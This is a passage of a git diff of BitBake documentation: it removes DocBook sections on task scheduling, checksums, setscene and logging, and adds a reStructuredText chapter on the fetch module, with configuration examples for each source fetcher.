-            Logging will be handled in a way similar to shell tasks as well.
-        </para>
-
-        <para>
-            The order in which BitBake runs the tasks is controlled by its
-            task scheduler.
-            It is possible to configure the scheduler and define custom
-            implementations for specific use cases.
-            For more information, see these variables that control the
-            behavior:
-            <itemizedlist>
-                <listitem><para>
-                    <link linkend='var-bb-BB_SCHEDULER'><filename>BB_SCHEDULER</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_SCHEDULERS'><filename>BB_SCHEDULERS</filename></link>
-                    </para></listitem>
-            </itemizedlist>
-            It is possible to have functions run before and after a task's main
-            function.
-            This is done using the <filename>[prefuncs]</filename>
-            and <filename>[postfuncs]</filename> flags of the task
-            that lists the functions to run.
-        </para>
-    </section>
-
-    <section id='checksums'>
-        <title>Checksums (Signatures)</title>
-
-        <para>
-            A checksum is a unique signature of a task's inputs.
-            The signature of a task can be used to determine if a task
-            needs to be run.
-            Because it is a change in a task's inputs that triggers running
-            the task, BitBake needs to detect all the inputs to a given task.
-            For shell tasks, this turns out to be fairly easy because
-            BitBake generates a "run" shell script for each task and
-            it is possible to create a checksum that gives you a good idea of when
-            the task's data changes.
-        </para>
-
-        <para>
-            To complicate the problem, some things should not be included in
-            the checksum.
-            First, there is the actual specific build path of a given task -
-            the working directory.
-            It does not matter if the working directory changes because it should not
-            affect the output for target packages.
-            The simplistic approach for excluding the working directory is to set
-            it to some fixed value and create the checksum for the "run" script.
-            BitBake goes one step better and uses the
-            <link linkend='var-bb-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></link>
-            variable to define a list of variables that should never be included
-            when generating the signatures.
-        </para>
-
-        <para>
-            Another problem results from the "run" scripts containing functions that
-            might or might not get called.
-            The incremental build solution contains code that figures out dependencies
-            between shell functions.
-            This code is used to prune the "run" scripts down to the minimum set,
-            thereby alleviating this problem and making the "run" scripts much more
-            readable as a bonus.
-        </para>
-
-        <para>
-            So far we have solutions for shell scripts.
-            What about Python tasks?
-            The same approach applies even though these tasks are more difficult.
-            The process needs to figure out what variables a Python function accesses
-            and what functions it calls.
-            Again, the incremental build solution contains code that first figures out
-            the variable and function dependencies, and then creates a checksum for the data
-            used as the input to the task.
-        </para>
-
-        <para>
-            Like the working directory case, situations exist where dependencies
-            should be ignored.
-            For these cases, you can instruct the build process to ignore a dependency
-            by using a line like the following:
-            <literallayout class='monospaced'>
-     PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
-            </literallayout>
-            This example ensures that the <filename>PACKAGE_ARCHS</filename> variable does not
-            depend on the value of <filename>MACHINE</filename>, even if it does reference it.
-        </para>
-
-        <para>
-            Equally, there are cases where we need to add dependencies BitBake
-            is not able to find.
-            You can accomplish this by using a line like the following:
-            <literallayout class='monospaced'>
-      PACKAGE_ARCHS[vardeps] = "MACHINE"
-            </literallayout>
-            This example explicitly adds the <filename>MACHINE</filename> variable as a
-            dependency for <filename>PACKAGE_ARCHS</filename>.
-        </para>
-
-        <para>
-            Consider a case with in-line Python, for example, where BitBake is not
-            able to figure out dependencies.
-            When running in debug mode (i.e. using <filename>-DDD</filename>), BitBake
-            produces output when it discovers something for which it cannot figure out
-            dependencies.
-        </para>
-
-        <para>
-            Thus far, this section has limited discussion to the direct inputs into a task.
-            Information based on direct inputs is referred to as the "basehash" in the
-            code.
-            However, there is still the question of a task's indirect inputs - the
-            things that were already built and present in the build directory.
-            The checksum (or signature) for a particular task needs to add the hashes
-            of all the tasks on which the particular task depends.
-            Choosing which dependencies to add is a policy decision.
-            However, the effect is to generate a master checksum that combines the basehash
-            and the hashes of the task's dependencies.
-        </para>
-
-        <para>
-            At the code level, there are a variety of ways both the basehash and the
-            dependent task hashes can be influenced.
-            Within the BitBake configuration file, we can give BitBake some extra information
-            to help it construct the basehash.
-            The following statement effectively results in a list of global variable
-            dependency excludes - variables never included in any checksum.
-            This example uses variables from OpenEmbedded to help illustrate
-            the concept:
-            <literallayout class='monospaced'>
-     BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
-         SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
-         USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
-         PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
-         CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
-            </literallayout>
-            The previous example excludes the work directory, which is part of
-            <filename>TMPDIR</filename>.
-        </para>
-
-        <para>
-            The rules for deciding which hashes of dependent tasks to include through
-            dependency chains are more complex and are generally accomplished with a
-            Python function.
-            The code in <filename>meta/lib/oe/sstatesig.py</filename> shows two examples
-            of this and also illustrates how you can insert your own policy into the system
-            if so desired.
-            This file defines the two basic signature generators OpenEmbedded-Core
-            uses:  "OEBasic" and "OEBasicHash".
-            By default, there is a dummy "noop" signature handler enabled in BitBake.
-            This means that behavior is unchanged from previous versions.
-            <filename>OE-Core</filename> uses the "OEBasicHash" signature handler by default
-            through this setting in the <filename>bitbake.conf</filename> file:
-            <literallayout class='monospaced'>
-     BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-            </literallayout>
-            The "OEBasicHash" <filename>BB_SIGNATURE_HANDLER</filename> is the same as the
-            "OEBasic" version but adds the task hash to the stamp files.
-            This results in any metadata change that changes the task hash, automatically
-            causing the task to be run again.
-            This removes the need to bump
-            <link linkend='var-bb-PR'><filename>PR</filename></link>
-            values, and changes to metadata automatically ripple across the build.
-        </para>
-
-        <para>
-            It is also worth noting that the end result of these signature generators is to
-            make some dependency and hash information available to the build.
-            This information includes:
-            <itemizedlist>
-                <listitem><para><filename>BB_BASEHASH_task-</filename><replaceable>taskname</replaceable>:
-                    The base hashes for each task in the recipe.
-                    </para></listitem>
-                <listitem><para><filename>BB_BASEHASH_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
-                    The base hashes for each dependent task.
-                    </para></listitem>
-                <listitem><para><filename>BBHASHDEPS_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
-                    The task dependencies for each task.
-                    </para></listitem>
-                <listitem><para><filename>BB_TASKHASH</filename>:
-                    The hash of the currently running task.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            It is worth noting that BitBake's "-S" option lets you
-            debug BitBake's processing of signatures.
-            The options passed to -S allow different debugging modes
-            to be used, either using BitBake's own debug functions
-            or possibly those defined in the metadata/signature handler
-            itself.
-            The simplest parameter to pass is "none", which causes a
-            set of signature information to be written out into
-            <filename>STAMPS_DIR</filename>
-            corresponding to the targets specified.
-            The other currently available parameter is "printdiff",
-            which causes BitBake to try to establish the closest
-            signature match it can (e.g. in the sstate cache) and then
-            run <filename>bitbake-diffsigs</filename> over the matches
-            to determine the stamps and delta where these two
-            stamp trees diverge.
-            <note>
-                It is likely that future versions of BitBake will
-                provide other signature handlers triggered through
-                additional "-S" parameters.
-            </note>
-        </para>
-
-        <para>
-            You can find more information on checksum metadata in the
-            "<link linkend='task-checksums-and-setscene'>Task Checksums and Setscene</link>"
-            section.
-        </para>
-    </section>
-
-    <section id='setscene'>
-        <title>Setscene</title>
-
-        <para>
-            The setscene process enables BitBake to handle "pre-built" artifacts.
-            The ability to handle and reuse these artifacts allows BitBake
-            the luxury of not having to build something from scratch every time.
-            Instead, BitBake can use, when possible, existing build artifacts.
-        </para>
-
-        <para>
-            BitBake needs to have reliable data indicating whether or not an
-            artifact is compatible.
-            Signatures, described in the previous section, provide an ideal
-            way of representing whether an artifact is compatible.
-            If a signature is the same, an object can be reused.
-        </para>
-
-        <para>
-            If an object can be reused, the problem then becomes how to
-            replace a given task or set of tasks with the pre-built artifact.
-            BitBake solves the problem with the "setscene" process.
-        </para>
-
-        <para>
-            When BitBake is asked to build a given target, before building anything,
-            it first asks whether cached information is available for any of the
-            targets it's building, or any of the intermediate targets.
-            If cached information is available, BitBake uses this information instead of
-            running the main tasks.
-        </para>
-
-        <para>
-            BitBake first calls the function defined by the
-            <link linkend='var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></link>
-            variable with a list of tasks and corresponding
-            hashes it wants to build.
-            This function is designed to be fast and returns a list
-            of the tasks for which it believes in can obtain artifacts.
-        </para>
-
-        <para>
-            Next, for each of the tasks that were returned as possibilities,
-            BitBake executes a setscene version of the task that the possible
-            artifact covers.
-            Setscene versions of a task have the string "_setscene" appended to the
-            task name.
-            So, for example, the task with the name <filename>xxx</filename> has
-            a setscene task named <filename>xxx_setscene</filename>.
-            The setscene version of the task executes and provides the necessary
-            artifacts returning either success or failure.
-        </para>
-
-        <para>
-            As previously mentioned, an artifact can cover more than one task.
-            For example, it is pointless to obtain a compiler if you
-            already have the compiled binary.
-            To handle this, BitBake calls the
-            <link linkend='var-bb-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></link>
-            function for each successful setscene task to know whether or not it needs
-            to obtain the dependencies of that task.
-        </para>
-
-        <para>
-            Finally, after all the setscene tasks have executed, BitBake calls the
-            function listed in
-            <link linkend='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></link>
-            with the list of tasks BitBake thinks has been "covered".
-            The metadata can then ensure that this list is correct and can
-            inform BitBake that it wants specific tasks to be run regardless
-            of the setscene result.
-        </para>
-
-        <para>
-            You can find more information on setscene metadata in the
-            "<link linkend='task-checksums-and-setscene'>Task Checksums and Setscene</link>"
-            section.
-        </para>
-    </section>
-
-    <section id="logging">
-        <title>Logging</title>
-        <para>
-            In addition to the standard command line option to control how
-            verbose builds are when execute, bitbake also supports user defined
-            configuration of the
-            <ulink url='https://docs.python.org/3/library/logging.html'>Python logging</ulink>
-            facilities through the
-            <link linkend="var-bb-BB_LOGCONFIG"><filename>BB_LOGCONFIG</filename></link>
-            variable. This variable defines a json or yaml
-            <ulink url='https://docs.python.org/3/library/logging.config.html'>logging configuration</ulink>
-            that will be intelligently merged into the default configuration.
-            The logging configuration is merged using the following rules:
-            <itemizedlist>
-                <listitem><para>
-                    The user defined configuration will completely replace the default
-                    configuration if top level key
-                    <filename>bitbake_merge</filename> is set to the value
-                    <filename>False</filename>. In this case, all other rules
-                    are ignored.
-                </para></listitem>
-                <listitem><para>
-                    The user configuration must have a top level
-                    <filename>version</filename> which must match the value of
-                    the default configuration.
-                </para></listitem>
-                <listitem><para>
-                    Any keys defined in the <filename>handlers</filename>,
-                    <filename>formatters</filename>, or <filename>filters</filename>,
-                    will be merged into the same section in the default
-                    configuration, with the user specified keys taking
-                    replacing a default one if there is a conflict. In
-                    practice, this means that if both the default configuration
-                    and user configuration specify a handler named
-                    <filename>myhandler</filename>, the user defined one will
-                    replace the default. To prevent the user from inadvertently
-                    replacing a default handler, formatter, or filter, all of
-                    the default ones are named with a prefix of
-                    "<filename>BitBake.</filename>"
-                </para></listitem>
-                <listitem><para>
-                    If a logger is defined by the user with the key
-                    <filename>bitbake_merge</filename> set to
-                    <filename>False</filename>, that logger will be completely
-                    replaced by user configuration. In this case, no other
-                    rules will apply to that logger.
-                </para></listitem>
-                <listitem><para>
-                    All user defined <filename>filter</filename> and
-                    <filename>handlers</filename> properties for a given logger
-                    will be merged with corresponding properties from the
-                    default logger. For example, if the user configuration adds
-                    a filter called <filename>myFilter</filename> to the
-                    <filename>BitBake.SigGen</filename>, and the default
-                    configuration adds a filter called
-                    <filename>BitBake.defaultFilter</filename>, both filters
-                    will be applied to the logger
-                </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            As an example, consider the following user logging configuration
-            file which logs all Hash Equivalence related messages of VERBOSE or
-            higher to a file called <filename>hashequiv.log</filename>
-            <literallayout class='monospaced'>
-    {
-        "version": 1,
-        "handlers": {
-            "autobuilderlog": {
-                "class": "logging.FileHandler",
-                "formatter": "logfileFormatter",
-                "level": "DEBUG",
-                "filename": "hashequiv.log",
-                "mode": "w"
-            }
-        },
-        "formatters": {
-                "logfileFormatter": {
-                    "format": "%(name)s: %(levelname)s: %(message)s"
-                }
-        },
-        "loggers": {
-            "BitBake.SigGen.HashEquiv": {
-                "level": "VERBOSE",
-                "handlers": ["autobuilderlog"]
-            },
-            "BitBake.RunQueue.HashEquiv": {
-                "level": "VERBOSE",
-                "handlers": ["autobuilderlog"]
-            }
-        }
-    }
-            </literallayout>
-        </para>
-    </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
new file mode 100644
index 0000000000..75e8dd69d9
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
@@ -0,0 +1,621 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=====================
+File Download Support
+=====================
+
+|
+
+BitBake's fetch module is a standalone piece of library code that deals
+with the intricacies of downloading source code and files from remote
+systems. Fetching source code is one of the cornerstones of building
+software. As such, this module forms an important part of BitBake.
+
+The current fetch module is called "fetch2" and refers to the fact that
+it is the second major version of the API. The original version is
+obsolete and has been removed from the codebase. Thus, in all cases,
+"fetch" refers to "fetch2" in this manual.
+
+The Download (Fetch)
+====================
+
+BitBake takes several steps when fetching source code or files. The
+fetcher codebase deals with two distinct processes in order: obtaining
+the files from somewhere (cached or otherwise) and then unpacking those
+files into a specific location and perhaps in a specific way. Getting
+and unpacking the files is often optionally followed by patching.
+Patching, however, is not covered by this module.
+
+The code to execute the first part of this process, a fetch, looks
+something like the following: ::
+
+   src_uri = (d.getVar('SRC_URI') or "").split()
+   fetcher = bb.fetch2.Fetch(src_uri, d)
+   fetcher.download()
+
+This code sets up an instance of the fetch class. The instance uses a
+space-separated list of URLs from the :term:`SRC_URI`
+variable and then calls the ``download`` method to download the files.
+
+The instantiation of the fetch class is usually followed by: ::
+
+   rootdir = l.getVar('WORKDIR')
+   fetcher.unpack(rootdir)
+
+This code unpacks the downloaded files to the specified by ``WORKDIR``.
+
+.. note::
+
+   For convenience, the naming in these examples matches the variables
+   used by OpenEmbedded. If you want to see the above code in action,
+   examine the OpenEmbedded class file ``base.bbclass``
+   .
+
+The ``SRC_URI`` and ``WORKDIR`` variables are not hardcoded into the
+fetcher, since those fetcher methods can be (and are) called with
+different variable names. In OpenEmbedded for example, the shared state
+(sstate) code uses the fetch module to fetch the sstate files.
+
+When the ``download()`` method is called, BitBake tries to resolve the
+URLs by looking for source files in a specific search order:
+
+-  *Pre-mirror Sites:* BitBake first uses pre-mirrors to try and find
+   source files. These locations are defined using the
+   :term:`PREMIRRORS` variable.
+
+-  *Source URI:* If pre-mirrors fail, BitBake uses the original URL (e.g
+   from ``SRC_URI``).
+
+-  *Mirror Sites:* If fetch failures occur, BitBake next uses mirror
+   locations as defined by the :term:`MIRRORS` variable.
+
+For each URL passed to the fetcher, the fetcher calls the submodule that
+handles that particular URL type. This behavior can be the source of
+some confusion when you are providing URLs for the ``SRC_URI`` variable.
+Consider the following two URLs: ::
+
+   http://git.yoctoproject.org/git/poky;protocol=git
+   git://git.yoctoproject.org/git/poky;protocol=http
+
+In the former case, the URL is passed to the ``wget`` fetcher, which does not
+understand "git". Therefore, the latter case is the correct form since the Git
+fetcher does know how to use HTTP as a transport.
+
+Here are some examples that show commonly used mirror definitions: ::
+
+   PREMIRRORS ?= "\
+      bzr://.*/.\*  http://somemirror.org/sources/ \\n \
+      cvs://.*/.\*  http://somemirror.org/sources/ \\n \
+      git://.*/.\*  http://somemirror.org/sources/ \\n \
+      hg://.*/.\*   http://somemirror.org/sources/ \\n \
+      osc://.*/.\*  http://somemirror.org/sources/ \\n \
+      p4://.*/.\*   http://somemirror.org/sources/ \\n \
+     svn://.*/.\*   http://somemirror.org/sources/ \\n"
+
+   MIRRORS =+ "\
+      ftp://.*/.\*   http://somemirror.org/sources/ \\n \
+      http://.*/.\*  http://somemirror.org/sources/ \\n \
+      https://.*/.\* http://somemirror.org/sources/ \\n"
+
+It is useful to note that BitBake
+supports cross-URLs. It is possible to mirror a Git repository on an
+HTTP server as a tarball. This is what the ``git://`` mapping in the
+previous example does.
+
+Since network accesses are slow, BitBake maintains a cache of files
+downloaded from the network. Any source files that are not local (i.e.
+downloaded from the Internet) are placed into the download directory,
+which is specified by the :term:`DL_DIR` variable.
+
+File integrity is of key importance for reproducing builds. For
+non-local archive downloads, the fetcher code can verify SHA-256 and MD5
+checksums to ensure the archives have been downloaded correctly. You can
+specify these checksums by using the ``SRC_URI`` variable with the
+appropriate varflags as follows: ::
+
+   SRC_URI[md5sum] = "value"
+   SRC_URI[sha256sum] = "value"
+
+You can also specify the checksums as
+parameters on the ``SRC_URI`` as shown below: ::
+
+  SRC_URI = "http://example.com/foobar.tar.bz2;md5sum=4a8e0f237e961fd7785d19d07fdb994d"
+
+If multiple URIs exist, you can specify the checksums either directly as
+in the previous example, or you can name the URLs. The following syntax
+shows how you name the URIs: ::
+
+   SRC_URI = "http://example.com/foobar.tar.bz2;name=foo"
+   SRC_URI[foo.md5sum] = 4a8e0f237e961fd7785d19d07fdb994d
+
+After a file has been downloaded and
+has had its checksum checked, a ".done" stamp is placed in ``DL_DIR``.
+BitBake uses this stamp during subsequent builds to avoid downloading or
+comparing a checksum for the file again.
+
+.. note::
+
+   It is assumed that local storage is safe from data corruption. If
+   this were not the case, there would be bigger issues to worry about.
+
+If :term:`BB_STRICT_CHECKSUM` is set, any
+download without a checksum triggers an error message. The
+:term:`BB_NO_NETWORK` variable can be used to
+make any attempted network access a fatal error, which is useful for
+checking that mirrors are complete as well as other things.
+
+.. _bb-the-unpack:
+
+The Unpack
+==========
+
+The unpack process usually immediately follows the download. For all
+URLs except Git URLs, BitBake uses the common ``unpack`` method.
+
+A number of parameters exist that you can specify within the URL to
+govern the behavior of the unpack stage:
+
+-  *unpack:* Controls whether the URL components are unpacked. If set to
+   "1", which is the default, the components are unpacked. If set to
+   "0", the unpack stage leaves the file alone. This parameter is useful
+   when you want an archive to be copied in and not be unpacked.
+
+-  *dos:* Applies to ``.zip`` and ``.jar`` files and specifies whether
+   to use DOS line ending conversion on text files.
+
+-  *basepath:* Instructs the unpack stage to strip the specified
+   directories from the source path when unpacking.
+
+-  *subdir:* Unpacks the specific URL to the specified subdirectory
+   within the root directory.
+
+The unpack call automatically decompresses and extracts files with ".Z",
+".z", ".gz", ".xz", ".zip", ".jar", ".ipk", ".rpm". ".srpm", ".deb" and
+".bz2" extensions as well as various combinations of tarball extensions.
+
+As mentioned, the Git fetcher has its own unpack method that is
+optimized to work with Git trees. Basically, this method works by
+cloning the tree into the final directory. The process is completed
+using references so that there is only one central copy of the Git
+metadata needed.
+
+.. _bb-fetchers:
+
+Fetchers
+========
+
+As mentioned earlier, the URL prefix determines which fetcher submodule
+BitBake uses. Each submodule can support different URL parameters, which
+are described in the following sections.
+
+.. _local-file-fetcher:
+
+Local file fetcher (``file://``)
+--------------------------------
+
+This submodule handles URLs that begin with ``file://``. The filename
+you specify within the URL can be either an absolute or relative path to
+a file. If the filename is relative, the contents of the
+:term:`FILESPATH` variable is used in the same way
+``PATH`` is used to find executables. If the file cannot be found, it is
+assumed that it is available in :term:`DL_DIR` by the
+time the ``download()`` method is called.
+
+If you specify a directory, the entire directory is unpacked.
+
+Here are a couple of example URLs, the first relative and the second
+absolute: ::
+
+   SRC_URI = "file://relativefile.patch"
+   SRC_URI = "file:///Users/ich/very_important_software"
+
+.. _http-ftp-fetcher:
+
+HTTP/FTP wget fetcher (``http://``, ``ftp://``, ``https://``)
+-------------------------------------------------------------
+
+This fetcher obtains files from web and FTP servers. Internally, the
+fetcher uses the wget utility.
+
+The executable and parameters used are specified by the
+``FETCHCMD_wget`` variable, which defaults to sensible values. The
+fetcher supports a parameter "downloadfilename" that allows the name of
+the downloaded file to be specified. Specifying the name of the
+downloaded file is useful for avoiding collisions in
+:term:`DL_DIR` when dealing with multiple files that
+have the same name.
+
+Some example URLs are as follows: ::
+
+   SRC_URI = "http://oe.handhelds.org/not_there.aac"
+   SRC_URI = "ftp://oe.handhelds.org/not_there_as_well.aac"
+   SRC_URI = "ftp://you@oe.handhelds.org/home/you/secret.plan"
+
+.. note::
+
+   Because URL parameters are delimited by semi-colons, this can
+   introduce ambiguity when parsing URLs that also contain semi-colons,
+   for example:
+   ::
+
+           SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git;a=snapshot;h=a5dd47"
+
+
+   Such URLs should should be modified by replacing semi-colons with '&'
+   characters:
+   ::
+
+           SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&a=snapshot&h=a5dd47"
+
+
+   In most cases this should work. Treating semi-colons and '&' in
+   queries identically is recommended by the World Wide Web Consortium
+   (W3C). Note that due to the nature of the URL, you may have to
+   specify the name of the downloaded file as well:
+   ::
+
+           SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&a=snapshot&h=a5dd47;downloadfilename=myfile.bz2"
+
+
+.. _cvs-fetcher:
+
+CVS fetcher (``(cvs://``)
+-------------------------
+
+This submodule handles checking out files from the CVS version control
+system. You can configure it using a number of different variables:
+
+-  :term:`FETCHCMD_cvs <FETCHCMD>`: The name of the executable to use when running
+   the ``cvs`` command. This name is usually "cvs".
+
+-  :term:`SRCDATE`: The date to use when fetching the CVS source code. A
+   special value of "now" causes the checkout to be updated on every
+   build.
+
+-  :term:`CVSDIR`: Specifies where a temporary
+   checkout is saved. The location is often ``DL_DIR/cvs``.
+
+-  CVS_PROXY_HOST: The name to use as a "proxy=" parameter to the
+   ``cvs`` command.
+
+-  CVS_PROXY_PORT: The port number to use as a "proxyport="
+   parameter to the ``cvs`` command.
+
+As well as the standard username and password URL syntax, you can also
+configure the fetcher with various URL parameters:
+
+The supported parameters are as follows:
+
+-  *"method":* The protocol over which to communicate with the CVS
+   server. By default, this protocol is "pserver". If "method" is set to
+   "ext", BitBake examines the "rsh" parameter and sets ``CVS_RSH``. You
+   can use "dir" for local directories.
+
+-  *"module":* Specifies the module to check out. You must supply this
+   parameter.
+
+-  *"tag":* Describes which CVS TAG should be used for the checkout. By
+   default, the TAG is empty.
+
+-  *"date":* Specifies a date. If no "date" is specified, the
+   :term:`SRCDATE` of the configuration is used to
+   checkout a specific date. The special value of "now" causes the
+   checkout to be updated on every build.
+
+-  *"localdir":* Used to rename the module. Effectively, you are
+   renaming the output directory to which the module is unpacked. You
+   are forcing the module into a special directory relative to
+   :term:`CVSDIR`.
+
+-  *"rsh":* Used in conjunction with the "method" parameter.
+
+-  *"scmdata":* Causes the CVS metadata to be maintained in the tarball
+   the fetcher creates when set to "keep". The tarball is expanded into
+   the work directory. By default, the CVS metadata is removed.
+
+-  *"fullpath":* Controls whether the resulting checkout is at the
+   module level, which is the default, or is at deeper paths.
+
+-  *"norecurse":* Causes the fetcher to only checkout the specified
+   directory with no recurse into any subdirectories.
+
+-  *"port":* The port to which the CVS server connects.
+
+Some example URLs are as follows: ::
+
+   SRC_URI = "cvs://CVSROOT;module=mymodule;tag=some-version;method=ext"
+   SRC_URI = "cvs://CVSROOT;module=mymodule;date=20060126;localdir=usethat"
+
+.. _svn-fetcher:
+
+Subversion (SVN) Fetcher (``svn://``)
+-------------------------------------
+
+This fetcher submodule fetches code from the Subversion source control
+system. The executable used is specified by ``FETCHCMD_svn``, which
+defaults to "svn". The fetcher's temporary working directory is set by
+:term:`SVNDIR`, which is usually ``DL_DIR/svn``.
+
+The supported parameters are as follows:
+
+-  *"module":* The name of the svn module to checkout. You must provide
+   this parameter. You can think of this parameter as the top-level
+   directory of the repository data you want.
+
+-  *"path_spec":* A specific directory in which to checkout the
+   specified svn module.
+
+-  *"protocol":* The protocol to use, which defaults to "svn". If
+   "protocol" is set to "svn+ssh", the "ssh" parameter is also used.
+
+-  *"rev":* The revision of the source code to checkout.
+
+-  *"scmdata":* Causes the ".svn" directories to be available during
+   compile-time when set to "keep". By default, these directories are
+   removed.
+
+-  *"ssh":* An optional parameter used when "protocol" is set to
+   "svn+ssh". You can use this parameter to specify the ssh program used
+   by svn.
+
+-  *"transportuser":* When required, sets the username for the
+   transport. By default, this parameter is empty. The transport
+   username is different than the username used in the main URL, which
+   is passed to the subversion command.
+
+Following are three examples using svn: ::
+
+   SRC_URI = "svn://myrepos/proj1;module=vip;protocol=http;rev=667"
+   SRC_URI = "svn://myrepos/proj1;module=opie;protocol=svn+ssh"
+   SRC_URI = "svn://myrepos/proj1;module=trunk;protocol=http;path_spec=${MY_DIR}/proj1"
+
+.. _git-fetcher:
+
+Git Fetcher (``git://``)
+------------------------
+
+This fetcher submodule fetches code from the Git source control system.
+The fetcher works by creating a bare clone of the remote into
+:term:`GITDIR`, which is usually ``DL_DIR/git2``. This
+bare clone is then cloned into the work directory during the unpack
+stage when a specific tree is checked out. This is done using alternates
+and by reference to minimize the amount of duplicate data on the disk
+and make the unpack process fast. The executable used can be set with
+``FETCHCMD_git``.
+
+This fetcher supports the following parameters:
+
+-  *"protocol":* The protocol used to fetch the files. The default is
+   "git" when a hostname is set. If a hostname is not set, the Git
+   protocol is "file". You can also use "http", "https", "ssh" and
+   "rsync".
+
+-  *"nocheckout":* Tells the fetcher to not checkout source code when
+   unpacking when set to "1". Set this option for the URL where there is
+   a custom routine to checkout code. The default is "0".
+
+-  *"rebaseable":* Indicates that the upstream Git repository can be
+   rebased. You should set this parameter to "1" if revisions can become
+   detached from branches. In this case, the source mirror tarball is
+   done per revision, which has a loss of efficiency. Rebasing the
+   upstream Git repository could cause the current revision to disappear
+   from the upstream repository. This option reminds the fetcher to
+   preserve the local cache carefully for future use. The default value
+   for this parameter is "0".
+
+-  *"nobranch":* Tells the fetcher to not check the SHA validation for
+   the branch when set to "1". The default is "0". Set this option for
+   the recipe that refers to the commit that is valid for any namespace
+   (branch, tag, ...) instead of the branch.
+
+-  *"bareclone":* Tells the fetcher to clone a bare clone into the
+   destination directory without checking out a working tree. Only the
+   raw Git metadata is provided. This parameter implies the "nocheckout"
+   parameter as well.
+
+-  *"branch":* The branch(es) of the Git tree to clone. If unset, this
+   is assumed to be "master". The number of branch parameters much match
+   the number of name parameters.
+
+-  *"rev":* The revision to use for the checkout. The default is
+   "master".
+
+-  *"tag":* Specifies a tag to use for the checkout. To correctly
+   resolve tags, BitBake must access the network. For that reason, tags
+   are often not used. As far as Git is concerned, the "tag" parameter
+   behaves effectively the same as the "rev" parameter.
+
+-  *"subpath":* Limits the checkout to a specific subpath of the tree.
+   By default, the whole tree is checked out.
+
+-  *"destsuffix":* The name of the path in which to place the checkout.
+   By default, the path is ``git/``.
+
+-  *"usehead":* Enables local ``git://`` URLs to use the current branch
+   HEAD as the revision for use with ``AUTOREV``. The "usehead"
+   parameter implies no branch and only works when the transfer protocol
+   is ``file://``.
+
+Here are some example URLs: ::
+
+   SRC_URI = "git://git.oe.handhelds.org/git/vip.git;tag=version-1"
+   SRC_URI = "git://git.oe.handhelds.org/git/vip.git;protocol=http"
+
+.. _gitsm-fetcher:
+
+Git Submodule Fetcher (``gitsm://``)
+------------------------------------
+
+This fetcher submodule inherits from the :ref:`Git
+fetcher<bitbake-user-manual/bitbake-user-manual-fetching:git fetcher
+(\`\`git://\`\`)>` and extends that fetcher's behavior by fetching a
+repository's submodules. :term:`SRC_URI` is passed to the Git fetcher as
+described in the :ref:`bitbake-user-manual/bitbake-user-manual-fetching:git
+fetcher (\`\`git://\`\`)` section.
+
+.. note::
+
+   You must clean a recipe when switching between '``git://``' and
+   '``gitsm://``' URLs.
+
+   The Git Submodules fetcher is not a complete fetcher implementation.
+   The fetcher has known issues where it does not use the normal source
+   mirroring infrastructure properly. Further, the submodule sources it
+   fetches are not visible to the licensing and source archiving
+   infrastructures.
+
+.. _clearcase-fetcher:
+
+ClearCase Fetcher (``ccrc://``)
+-------------------------------
+
+This fetcher submodule fetches code from a
+`ClearCase <http://en.wikipedia.org/wiki/Rational_ClearCase>`__
+repository.
+
+To use this fetcher, make sure your recipe has proper
+:term:`SRC_URI`, :term:`SRCREV`, and
+:term:`PV` settings. Here is an example: ::
+
+   SRC_URI = "ccrc://cc.example.org/ccrc;vob=/example_vob;module=/example_module"
+   SRCREV = "EXAMPLE_CLEARCASE_TAG"
+   PV = "${@d.getVar("SRCREV", False).replace("/", "+")}"
+
+The fetcher uses the ``rcleartool`` or
+``cleartool`` remote client, depending on which one is available.
+
+Following are options for the ``SRC_URI`` statement:
+
+-  *vob*: The name, which must include the prepending "/" character,
+   of the ClearCase VOB. This option is required.
+
+-  *module*: The module, which must include the prepending "/"
+   character, in the selected VOB.
+
+   .. note::
+
+      The module and vob options are combined to create the load rule in the
+      view config spec. As an example, consider the vob and module values from
+      the SRC_URI statement at the start of this section. Combining those values
+      results in the following: ::
+
+         load /example_vob/example_module
+
+-  *proto*: The protocol, which can be either ``http`` or ``https``.
+
+By default, the fetcher creates a configuration specification. If you
+want this specification written to an area other than the default, use
+the ``CCASE_CUSTOM_CONFIG_SPEC`` variable in your recipe to define where
+the specification is written.
+
+.. note::
+
+   the SRCREV loses its functionality if you specify this variable. However,
+   SRCREV is still used to label the archive after a fetch even though it does
+   not define what is fetched.
+
+Here are a couple of other behaviors worth mentioning:
+
+-  When using ``cleartool``, the login of ``cleartool`` is handled by
+   the system. The login require no special steps.
+
+-  In order to use ``rcleartool`` with authenticated users, an
+   "rcleartool login" is necessary before using the fetcher.
+
+.. _perforce-fetcher:
+
+Perforce Fetcher (``p4://``)
+----------------------------
+
+This fetcher submodule fetches code from the
+`Perforce <https://www.perforce.com/>`__ source control system. The
+executable used is specified by ``FETCHCMD_p4``, which defaults to "p4".
